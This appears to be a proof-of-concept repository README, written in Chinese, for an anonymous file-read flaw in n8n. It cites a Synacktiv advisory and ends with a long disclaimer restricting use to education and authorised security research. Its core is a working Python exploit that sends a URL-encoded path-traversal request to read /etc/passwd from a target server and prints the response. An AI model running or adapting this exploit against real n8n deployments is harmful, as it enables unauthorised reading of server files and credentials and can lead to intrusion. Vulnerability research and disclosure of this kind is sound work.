该漏洞允许在 n8n 中匿名读取文件。
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
本仓库中提供的概念验证(PoC)仅用于教育和安全研究目的。所提供的信息和代码旨在供网络安全专业人员和研究人员使用,以了解并防范软件和系统中的漏洞。未经事先双方同意,使用本 PoC、相关信息或代码攻击目标是非法的,并受到严格禁止。
使用本 PoC 即表示您同意:您了解该 PoC 所演示漏洞的潜在影响,并将以负责任且合乎道德的方式使用它。本 PoC 的作者声明,对任何滥用本材料的行为或使用所提供信息和代码可能导致的任何损害不承担任何责任。遵守所有适用的地方、州、国家和国际法律是最终用户的责任。
作者已尽一切努力确保本仓库中所提供信息的准确性和可靠性。但是,这些信息按“原样”提供,不作任何形式的担保。作者对所含信息的准确性、内容、完整性、合法性或可靠性不承担任何责任或义务。